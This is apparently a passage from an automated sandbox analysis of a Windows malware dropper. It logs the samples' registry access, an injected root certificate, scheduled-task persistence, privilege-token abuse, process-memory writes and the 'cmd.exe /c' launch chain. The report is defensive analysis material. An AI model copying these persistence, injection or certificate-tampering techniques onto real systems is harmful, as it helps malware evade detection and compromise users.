Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{ED57F3A1-B47B-11EF-A5E9-FE7389BE724D} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\d5a6f77b01f6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\61d1121b032c3d74.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2464 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 17e6077dcf7a402.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 61d1121b032c3d74.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f08378aa2c3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c APPNAME55.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0637ac7677d0cf7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d5a6f77b01f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08280a9f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 97c06d9b6fa6f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\d5a6f77b01f6.exe

d5a6f77b01f6.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\61d1121b032c3d74.exe

61d1121b032c3d74.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe

5d456d381f2e1.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe

97c06d9b6fa6f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe

5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe

17e6077dcf7a402.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\0637ac7677d0cf7.exe

0637ac7677d0cf7.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\f08378aa2c3.exe

f08378aa2c3.exe

C:\Users\Admin\AppData\Local\Temp\7zS4099E187\08280a9f8.exe

08280a9f8.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

